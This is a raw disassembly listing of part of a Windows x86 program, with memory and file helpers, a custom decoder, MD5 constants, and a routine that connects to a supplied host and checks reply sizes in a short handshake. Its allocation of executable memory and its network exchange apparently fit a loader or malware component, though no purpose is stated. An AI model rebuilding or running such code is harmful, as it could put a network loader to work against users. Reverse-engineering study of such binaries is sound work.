; Attributes: bp-based frame
sub_40A3A4 proc near ; CODE XREF: sub_4049A0+21�p
; sub_4049A0+34�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_8]
rep stosb
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_40A3A4 endp
; =============== S U B R O U T I N E =======================================
sub_40A3BC proc near ; CODE XREF: sub_40AD10+31�p
push 40h
push 1000h
push 2061h
push 0
call sub_40A22A
mov word ptr [eax], 8000h
mov dword ptr [eax+4Dh], 10h
retn
sub_40A3BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A3DC proc near ; CODE XREF: sub_40AD10+119�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_40A3DC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40A420
mov ecx, [ebp+8]
call sub_40C140
pop ebx
pop esi
pop edi
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A420 proc near ; CODE XREF: rdata:0040A40C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ecx
mov eax, [ebp+arg_0]
lea edi, [eax+51h]
mov ecx, 10h
mov esi, [ebp+arg_4]
rep movsb
pop ecx
pop esi
pop edi
leave
retn 8
sub_40A420 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
push dword ptr [ebp+8]
call sub_40A308
or eax, eax
jz short loc_40A458
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
jmp short loc_40A460
; ---------------------------------------------------------------------------
loc_40A458: ; CODE XREF: rdata:0040A44D�j
push dword ptr [ebp+8]
call sub_40A31A
loc_40A460: ; CODE XREF: rdata:0040A456�j
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
push 0
push 80h
push 4
push 0
push 3
push 40000000h
push dword ptr [ebp+8]
call sub_40A110
cmp eax, 0FFFFFFFFh
jz short loc_40A4BA
mov [ebp-4], eax
push 0
push 0
push dword ptr [ebp+0Ch]
push dword ptr [ebp-4]
call sub_40A206
push 0
push esp
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp-4]
call sub_40A242
push dword ptr [ebp-4]
call sub_40A0FE
loc_40A4BA: ; CODE XREF: rdata:0040A48D�j
pop ebx
pop esi
pop edi
leave
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov ebx, 0FFFFFFFFh
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push dword ptr [ebp+8]
call sub_40A110
mov [ebp-4], eax
cmp eax, 0FFFFFFFFh
jz short loc_40A540
push 0
push dword ptr [ebp-4]
call sub_40A176
mov [ebp-8], eax
push 40h
push 1000h
push dword ptr [ebp-8]
push 0
call sub_40A22A
or eax, eax
jz short loc_40A540
mov edi, eax
or eax, eax
jz short loc_40A540
mov ecx, [ebp+0Ch]
mov [ecx], edi
push 0
push esp
push dword ptr [ebp-8]
push edi
push dword ptr [ebp-4]
call sub_40A1E8
push dword ptr [ebp-4]
call sub_40A0FE
mov ecx, [ebp+10h]
mov eax, [ebp-8]
mov [ecx], eax
inc ebx
jmp short $+2
loc_40A540: ; CODE XREF: rdata:0040A4EF�j
; rdata:0040A511�j ...
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
push ebp
mov ebp, esp
add esp, 0FFFFFB48h
push edi
push esi
push ebx
mov ebx, 0FFFFFFFFh
lea eax, [ebp-260h]
push eax
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
push 1000000h
call sub_40AD10
cmp eax, 0FFFFFFFFh
jz loc_40A66F
cmp eax, 6
jz loc_40A66F
mov [ebp-25Ch], eax
push offset dword_4189F8
push offset dword_4188C4
call sub_40A25A
push 0
push 258h
lea eax, [ebp-258h]
push eax
call sub_40A3A4
lea eax, [ebp-258h]
mov byte ptr [eax], 40h
inc eax
push eax
push offset dword_4188C0
push offset dword_4188C4
call sub_40A680
lea eax, [ebp-258h]
inc eax
push dword ptr [ebp-260h]
push eax
push 0F0h
call sub_40DC90
lea eax, [ebp-4B8h]
push eax
push 26h
push 0F1h
lea eax, [ebp-258h]
push eax
call sub_40F330
push 0
push ecx
lea eax, [ebp-4B8h]
push eax
push dword ptr [ebp-25Ch]
call sub_40A338
push 0
push 258h
lea eax, [ebp-4B8h]
push eax
push dword ptr [ebp-25Ch]
call sub_40A32C
push eax
lea eax, [ebp-4B8h]
push eax
call sub_40F390
cmp edx, 26h
jnz short loc_40A64D
cmp ecx, 1
jnz short loc_40A64D
mov ebx, 1
jmp short loc_40A652
; ---------------------------------------------------------------------------
loc_40A64D: ; CODE XREF: rdata:0040A63F�j
; rdata:0040A644�j
mov ebx, 0FFFFFFFFh
loc_40A652: ; CODE XREF: rdata:0040A64B�j
push dword ptr [ebp-25Ch]
call sub_40A2FC
push 8000h
push 0
push dword ptr [ebp-260h]
call sub_40A230
loc_40A66F: ; CODE XREF: rdata:0040A57E�j
; rdata:0040A587�j
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A680 proc near ; CODE XREF: rdata:0040A5CA�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
push [ebp+arg_0]
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
call sub_40A6A0
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_40A680 endp
; ---------------------------------------------------------------------------
db 5
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6A0 proc near ; CODE XREF: sub_40A680+F�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push esi
mov [ebp+var_18], edx
mov [ebp+var_14], ecx
mov [ebp+var_10], 0
mov [ebp+var_C], 20h
mov [ebp+var_B], 0Dh
mov [ebp+var_A], 0Ah
mov [ebp+var_9], 3Dh
loc_40A6C4: ; CODE XREF: sub_40A6A0+57�j
mov [ebp+var_8], 0
jmp short loc_40A6D6
; ---------------------------------------------------------------------------
loc_40A6CD: ; CODE XREF: sub_40A6A0:loc_40A6F9�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_40A6D6: ; CODE XREF: sub_40A6A0+2B�j
cmp [ebp+var_8], 4
jnb short loc_40A6FB
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
mov eax, [ebp+var_8]
movsx ecx, [ebp+eax+var_C]
cmp edx, ecx
jnz short loc_40A6F9
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp short loc_40A6C4
; ---------------------------------------------------------------------------
loc_40A6F9: ; CODE XREF: sub_40A6A0+4C�j
jmp short loc_40A6CD
; ---------------------------------------------------------------------------
loc_40A6FB: ; CODE XREF: sub_40A6A0+3A�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_40A70A
jmp loc_40A8CD
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6A0+63�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+1]
test eax, eax
jnz short loc_40A71A
jmp loc_40A8CD
; ---------------------------------------------------------------------------
loc_40A71A: ; CODE XREF: sub_40A6A0+73�j
mov ecx, [ebp+arg_0]
mov cl, [ecx]
call sub_40A950
mov esi, eax
mov edx, [ebp+arg_0]
mov cl, [edx+1]
call sub_40A950
shl eax, 6
add esi, eax
mov eax, [ebp+var_18]
mov [eax], esi
mov ecx, [ebp+arg_0]
add ecx, 2
mov [ebp+arg_0], ecx
loc_40A744: ; CODE XREF: sub_40A6A0:loc_40A8C8�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
test eax, eax
jz loc_40A8CD
mov [ebp+var_8], 0
jmp short loc_40A764
; ---------------------------------------------------------------------------
loc_40A75B: ; CODE XREF: sub_40A6A0:loc_40A78A�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_40A764: ; CODE XREF: sub_40A6A0+B9�j
cmp [ebp+var_8], 4
jnb short loc_40A78C
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov ecx, [ebp+var_8]
movsx edx, [ebp+ecx+var_C]
cmp eax, edx
jnz short loc_40A78A
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp loc_40A8C8
; ---------------------------------------------------------------------------
loc_40A78A: ; CODE XREF: sub_40A6A0+DA�j
jmp short loc_40A75B
; ---------------------------------------------------------------------------
loc_40A78C: ; CODE XREF: sub_40A6A0+C8�j
mov ecx, [ebp+arg_0]
mov dl, [ecx]
mov [ebp+var_19], dl
mov cl, [ebp+var_19]
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
call sub_40A950
mov byte ptr [ebp+var_4], al
mov ecx, [ebp+var_18]
mov edx, [ebp+var_10]
cmp edx, [ecx]
jnb short loc_40A7D8
mov eax, [ebp+var_4]
and eax, 0FFh
and eax, 1
push eax
mov ecx, [ebp+var_10]
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
mov ecx, [ebp+var_14]
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
call sub_40A8E0
loc_40A7D8: ; CODE XREF: sub_40A6A0+110�j
mov ecx, [ebp+var_18]
mov edx, [ebp+var_10]
cmp edx, [ecx]
jnb short loc_40A808
mov eax, [ebp+var_4]
and eax, 0FFh
and eax, 2
push eax
mov ecx, [ebp+var_10]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
mov ecx, [ebp+var_14]
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
call sub_40A8E0
loc_40A808: ; CODE XREF: sub_40A6A0+140�j
mov ecx, [ebp+var_18]
mov edx, [ebp+var_10]
cmp edx, [ecx]
jnb short loc_40A838
mov eax, [ebp+var_4]
and eax, 0FFh
and eax, 4
push eax
mov ecx, [ebp+var_10]
mov [ebp+var_28], ecx
mov edx, [ebp+var_28]
mov ecx, [ebp+var_14]
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
call sub_40A8E0
loc_40A838: ; CODE XREF: sub_40A6A0+170�j
mov ecx, [ebp+var_18]
mov edx, [ebp+var_10]
cmp edx, [ecx]
jnb short loc_40A868
mov eax, [ebp+var_4]
and eax, 0FFh
and eax, 8
push eax
mov ecx, [ebp+var_10]
mov [ebp+var_2C], ecx
mov edx, [ebp+var_2C]
mov ecx, [ebp+var_14]
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
call sub_40A8E0
loc_40A868: ; CODE XREF: sub_40A6A0+1A0�j
mov ecx, [ebp+var_18]
mov edx, [ebp+var_10]
cmp edx, [ecx]
jnb short loc_40A898
mov eax, [ebp+var_4]
and eax, 0FFh
and eax, 10h
push eax
mov ecx, [ebp+var_10]
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
mov ecx, [ebp+var_14]
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
call sub_40A8E0
loc_40A898: ; CODE XREF: sub_40A6A0+1D0�j
mov ecx, [ebp+var_18]
mov edx, [ebp+var_10]
cmp edx, [ecx]
jnb short loc_40A8C8
mov eax, [ebp+var_4]
and eax, 0FFh
and eax, 20h
push eax
mov ecx, [ebp+var_10]
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
mov ecx, [ebp+var_14]
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
call sub_40A8E0
loc_40A8C8: ; CODE XREF: sub_40A6A0+E5�j
; sub_40A6A0+200�j
jmp loc_40A744
; ---------------------------------------------------------------------------
loc_40A8CD: ; CODE XREF: sub_40A6A0+65�j
; sub_40A6A0+75�j ...
pop esi
mov esp, ebp
pop ebp
retn 4
sub_40A6A0 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8E0 proc near ; CODE XREF: sub_40A6A0+133�p
; sub_40A6A0+163�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], edx
mov [ebp+var_8], ecx
mov eax, [ebp+var_C]
shr eax, 3
mov ecx, [ebp+var_8]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_C]
xor edx, edx
mov ecx, 8
div ecx
mov ecx, edx
mov edx, 1
shl edx, cl
not edx
mov eax, [ebp+var_4]
mov cl, [eax]
and cl, dl
mov edx, [ebp+var_4]
mov [edx], cl
cmp [ebp+arg_0], 0
jz short loc_40A944
mov eax, [ebp+var_C]
xor edx, edx
mov ecx, 8
div ecx
mov ecx, edx
mov edx, 1
shl edx, cl
mov eax, [ebp+var_4]
mov cl, [eax]
or cl, dl
mov edx, [ebp+var_4]
mov [edx], cl
loc_40A944: ; CODE XREF: sub_40A8E0+41�j
mov esp, ebp
pop ebp
retn 4
sub_40A8E0 endp
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A950 proc near ; CODE XREF: sub_40A6A0+7F�p
; sub_40A6A0+8C�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], cl
movsx eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
sub ecx, 2Bh
mov [ebp+var_8], ecx
cmp [ebp+var_8], 4Fh
ja loc_40ABC4
mov edx, [ebp+var_8]
jmp dword ptr ds:loc_4087C6+4[edx*4]
; ---------------------------------------------------------------------------
db 33h, 0C0h, 0E9h
dd 242h, 1B8h, 238E900h, 2B80000h, 0E9000000h, 22Eh, 3B8h
dd 224E900h, 4B80000h, 0E9000000h, 21Ah, 5B8h, 210E900h
dd 6B80000h, 0E9000000h, 206h, 7B8h, 1FCE900h, 8B80000h
dd 0E9000000h, 1F2h, 9B8h, 1E8E900h, 0AB80000h, 0E9000000h
dd 1DEh, 0BB8h, 1D4E900h, 0CB80000h, 0E9000000h, 1CAh
dd 0DB8h, 1C0E900h, 0EB80000h, 0E9000000h, 1B6h, 0FB8h
dd 1ACE900h, 10B80000h, 0E9000000h, 1A2h, 11B8h, 198E900h
dd 12B80000h, 0E9000000h, 18Eh, 13B8h, 184E900h, 14B80000h
dd 0E9000000h, 17Ah, 15B8h, 170E900h, 16B80000h, 0E9000000h
dd 166h, 17B8h, 15CE900h, 18B80000h, 0E9000000h, 152h
dd 19B8h, 148E900h, 1AB80000h, 0E9000000h, 13Eh, 1BB8h
dd 134E900h, 1CB80000h, 0E9000000h, 12Ah, 1DB8h, 120E900h
dd 1EB80000h, 0E9000000h, 116h, 1FB8h, 10CE900h, 20B80000h
dd 0E9000000h, 102h, 21B8h, 0F8E900h, 22B80000h, 0E9000000h
dd 0EEh, 23B8h, 0E4E900h, 24B80000h, 0E9000000h, 0DAh
dd 25B8h, 0D0E900h, 26B80000h, 0E9000000h, 0C6h, 27B8h
dd 0BCE900h, 28B80000h, 0E9000000h, 0B2h, 29B8h, 0A8E900h
dd 2AB80000h, 0E9000000h, 9Eh, 2BB8h, 94E900h, 2CB80000h
dd 0E9000000h, 8Ah, 2DB8h, 80E900h, 2EB80000h, 0EB000000h
dd 2FB879h, 72EB0000h, 30B8h, 0B86BEB00h, 31h, 32B864EBh
dd 0EB000000h, 33B85Dh, 56EB0000h, 34B8h, 0B84FEB00h, 35h
dd 36B848EBh, 0EB000000h, 37B841h, 3AEB0000h, 38B8h, 0B833EB00h
dd 39h, 3AB82CEBh, 0EB000000h, 3BB825h, 1EEB0000h, 3CB8h
dd 0B817EB00h, 3Dh, 3EB810EBh, 0EB000000h, 3FB809h, 2EB0000h
; ---------------------------------------------------------------------------
loc_40ABC4: ; CODE XREF: sub_40A950+1D�j
xor eax, eax
mov esp, ebp
pop ebp
retn
sub_40A950 endp
; ---------------------------------------------------------------------------
dd offset loc_4087B6
dd offset loc_4087C4
dd offset loc_4087BC+1
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_408579+4
dd offset loc_408584
dd offset loc_40858E
dd offset loc_408594+4
dd offset loc_40859E+4
dd offset loc_4085AC
dd offset loc_4085B3+3
dd offset loc_4085BF+1
dd offset loc_4085C9+1
dd offset loc_4085D2+2
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4086E2
dd offset loc_4086E8+4
dd offset loc_4086F5+1
dd offset loc_4086FD+3
dd offset loc_408709+1
dd offset loc_408712+2
dd offset loc_408718+6
dd offset loc_408726+2
dd offset loc_408730+2
dd offset loc_408739+3
dd offset loc_408746
dd offset loc_40874C+1
dd offset loc_408753+1
dd offset loc_40875B
dd offset loc_408762
dd offset loc_408769
dd offset loc_40876C+4
dd offset loc_408775+2
dd offset loc_40877C+2
dd offset loc_408783+2
dd offset loc_408788+4
dd offset loc_40878F+4
dd offset loc_408797+3
dd offset loc_4087A1
dd offset loc_4087A6+2
dd offset loc_4087AE+1
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4087C4
dd offset loc_4085DE
dd offset loc_4085E8
dd offset loc_4085EF+3
dd offset loc_4085FC
dd offset loc_408604+2
dd offset loc_40860C+4
dd offset loc_408618+2
dd offset loc_408622+2
dd offset loc_40862D+1
dd offset loc_408635+3
dd offset loc_408642
dd offset loc_408649+3
dd offset loc_408656
dd offset loc_408660
dd offset loc_408668+2
dd offset loc_408673+1
dd offset loc_408678+6
dd offset loc_408686+2
dd offset loc_40868C+6
dd offset loc_408696+6
dd offset loc_4086A4+2
dd offset loc_4086B0
dd offset loc_4086B7+3
dd offset loc_4086C4
dd offset loc_4086CC+2
dd offset loc_4086D4+4
dw 9B8Dh
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD10 proc near ; CODE XREF: rdata:0040A576�p
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFF90h
push edi
push esi
push ebx
mov ebx, 0FFFFFFFFh
push 40h
push 1000h
push 3000h
push 0
call sub_40A22A
mov [ebp+var_70], eax
push 0
push 50h
lea eax, [ebp+var_64]
push eax
call sub_40A3A4
call sub_40A3BC
mov [ebp+var_14], eax
cmp [ebp+arg_C], 0
jz short loc_40AD5C
push [ebp+var_14]
push [ebp+arg_C]
call sub_40A350
jmp short loc_40AD64
; ---------------------------------------------------------------------------
loc_40AD5C: ; CODE XREF: sub_40AD10+3D�j
push [ebp+var_14]
call sub_40F450
loc_40AD64: ; CODE XREF: sub_40AD10+4A�j
push 0
push 1
push 2
call sub_40A34A
cmp eax, 0FFFFFFFFh
jz loc_40AF30
mov [ebp+var_6C], eax
mov [ebp+var_10], 2
push [ebp+arg_8]
call sub_40A314
mov [ebp+var_E], ax
push [ebp+arg_4]
call sub_40A308
or eax, eax
jz short loc_40ADA2
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
jmp short loc_40ADAA
; ---------------------------------------------------------------------------
loc_40ADA2: ; CODE XREF: sub_40AD10+87�j
push [ebp+arg_4]
call sub_40A31A
loc_40ADAA: ; CODE XREF: sub_40AD10+90�j
cmp eax, 0FFFFFFFFh
jz loc_40AF30
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push [ebp+var_6C]
call sub_40A302
cmp eax, 0FFFFFFFFh
jz loc_40AF30
push [ebp+var_70]
push 1Bh
push 0
push 0
call sub_40F330
push 0
push ecx
push [ebp+var_70]
push [ebp+var_6C]
call sub_40A338
cmp eax, 0FFFFFFFFh
jz loc_40AF30
push 0
push 300h
push [ebp+var_70]
push [ebp+var_6C]
call sub_40A32C
mov esi, eax
push eax
push [ebp+var_70]
call sub_40F390
lea eax, [edx+eax]
add esi, eax
cmp esi, 45h
jnz loc_40AF30
mov esi, [ebp+var_70]
add esi, 0Ah
push ecx
push esi
lea eax, [ebp+var_64]
push eax
call sub_40A3DC
push [ebp+var_14]
lea eax, [ebp+var_64]
push eax
push 20h
call sub_40DC90
lea eax, [ebp+var_64]
push eax
call sub_40F400
push [ebp+var_70]
push 9
push 20h
lea eax, [ebp+var_64]
push eax
call sub_40F330
push 0
push ecx
push [ebp+var_70]
push [ebp+var_6C]
call sub_40A338
cmp eax, 0FFFFFFFFh
jz loc_40AF30
push 0
push 3000h
push [ebp+var_70]
push [ebp+var_6C]
call sub_40A32C
mov esi, eax
push eax
push [ebp+var_70]
call sub_40F390
lea eax, [edx+eax]
add esi, eax
cmp esi, 14h
jnz loc_40AF30
mov eax, [ebp+arg_0]
mov [ebp+var_68], eax
push [ebp+var_70]
push 1Ah
push 4
lea eax, [ebp+var_68]
push eax
call sub_40F330
push 0
push ecx
push [ebp+var_70]
push [ebp+var_6C]
call sub_40A338
push 0
push 3000h
push [ebp+var_70]
push [ebp+var_6C]
call sub_40A32C
push eax
push [ebp+var_70]
call sub_40F390
cmp edx, 1Ah
jnz short loc_40AEFE
push 8000h
push 0
push [ebp+var_70]
call sub_40A230
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov eax, [ebp+var_6C]
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
db 0EBh, 32h
; ---------------------------------------------------------------------------
loc_40AEFE: ; CODE XREF: sub_40AD10+1C9�j
push 8000h
push 0
push [ebp+var_70]
call sub_40A230
push 8000h
push 0
push [ebp+var_14]
call sub_40A230
push [ebp+var_6C]
call sub_40A2FC
mov eax, 6
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
loc_40AF30: ; CODE XREF: sub_40AD10+62�j
; sub_40AD10+9D�j ...
push 8000h
push 0
push [ebp+var_14]
call sub_40A230
push 8000h
push 0
push [ebp+var_70]
call sub_40A230
push [ebp+var_6C]
call sub_40A2FC
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 14h
sub_40AD10 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF60 proc near ; CODE XREF: sub_4049A0+5A�p
; sub_404A80+40�p ...
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 60h
mov [ebp+var_60], edx
mov [ebp+var_5C], ecx
lea ecx, [ebp+var_58]
call sub_40AF94
mov eax, [ebp+var_60]
push eax
mov edx, [ebp+var_5C]
lea ecx, [ebp+var_58]
call sub_40AFDA
lea edx, [ebp+var_58]
mov ecx, [ebp+arg_0]
call sub_40B0E1
mov esp, ebp
pop ebp
retn 4
sub_40AF60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF94 proc near ; CODE XREF: sub_40AF60+F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+14h], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+10h], 0
mov edx, [ebp+var_4]
mov dword ptr [edx], 67452301h
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0EFCDAB89h
mov ecx, [ebp+var_4]
mov dword ptr [ecx+8], 98BADCFEh
mov edx, [ebp+var_4]
mov dword ptr [edx+0Ch], 10325476h
mov esp, ebp
pop ebp
retn
sub_40AF94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AFDA proc near ; CODE XREF: sub_40AF60+1E�p
; sub_40B0E1+5C�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov ecx, [eax+10h]
shr ecx, 3
and ecx, 3Fh
mov [ebp+var_C], ecx
mov edx, [ebp+var_10]
mov eax, [edx+10h]
mov ecx, [ebp+arg_0]
lea edx, [eax+ecx*8]
mov eax, [ebp+var_10]
mov [eax+10h], edx
mov ecx, [ebp+arg_0]
shl ecx, 3
mov edx, [ebp+var_10]
cmp [edx+10h], ecx
jnb short loc_40B026
mov eax, [ebp+var_10]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_10]
mov [edx+14h], ecx
loc_40B026: ; CODE XREF: sub_40AFDA+3B�j
mov eax, [ebp+arg_0]
shr eax, 1Dh
mov ecx, [ebp+var_10]
mov edx, [ecx+14h]
add edx, eax
mov eax, [ebp+var_10]
mov [eax+14h], edx
mov ecx, 40h
sub ecx, [ebp+var_C]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
cmp edx, [ebp+var_8]
jb short loc_40B0AE
mov ecx, [ebp+var_8]
mov esi, [ebp+var_14]
mov eax, [ebp+var_C]
mov edx, [ebp+var_10]
lea edi, [edx+eax+18h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edx, [ebp+var_10]
add edx, 18h
mov ecx, [ebp+var_10]
call sub_40B215
mov ecx, [ebp+var_8]
mov [ebp+var_4], ecx
jmp short loc_40B08A
; ---------------------------------------------------------------------------
loc_40B081: ; CODE XREF: sub_40AFDA+C9�j
mov edx, [ebp+var_4]
add edx, 40h
mov [ebp+var_4], edx
loc_40B08A: ; CODE XREF: sub_40AFDA+A5�j
mov eax, [ebp+var_4]
add eax, 3Fh
cmp eax, [ebp+arg_0]
jnb short loc_40B0A5
mov edx, [ebp+var_14]
add edx, [ebp+var_4]
mov ecx, [ebp+var_10]
call sub_40B215
jmp short loc_40B081
; ---------------------------------------------------------------------------
loc_40B0A5: ; CODE XREF: sub_40AFDA+B9�j
mov [ebp+var_C], 0
jmp short loc_40B0B5
; ---------------------------------------------------------------------------
loc_40B0AE: ; CODE XREF: sub_40AFDA+71�j
mov [ebp+var_4], 0
loc_40B0B5: ; CODE XREF: sub_40AFDA+D2�j
mov ecx, [ebp+arg_0]
sub ecx, [ebp+var_4]
mov esi, [ebp+var_14]
add esi, [ebp+var_4]
mov edx, [ebp+var_C]
mov eax, [ebp+var_10]
lea edi, [eax+edx+18h]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_40AFDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B0E1 proc near ; CODE XREF: sub_40AF60+29�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push edi
mov [ebp+var_18], edx
mov [ebp+var_14], ecx
push 8
mov edx, [ebp+var_18]
add edx, 10h
lea ecx, [ebp+var_C]
call sub_40B16D
mov eax, [ebp+var_18]
mov ecx, [eax+10h]
shr ecx, 3
and ecx, 3Fh
mov [ebp+var_10], ecx
cmp [ebp+var_10], 38h
jnb short loc_40B120
mov edx, 38h
sub edx, [ebp+var_10]
mov [ebp+var_1C], edx
jmp short loc_40B12B
; ---------------------------------------------------------------------------
loc_40B120: ; CODE XREF: sub_40B0E1+30�j
mov eax, 78h
sub eax, [ebp+var_10]
mov [ebp+var_1C], eax
loc_40B12B: ; CODE XREF: sub_40B0E1+3D�j
mov ecx, [ebp+var_1C]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
mov edx, offset dword_418A60
mov ecx, [ebp+var_18]
call sub_40AFDA
push 8
lea edx, [ebp+var_C]
mov ecx, [ebp+var_18]
call sub_40AFDA
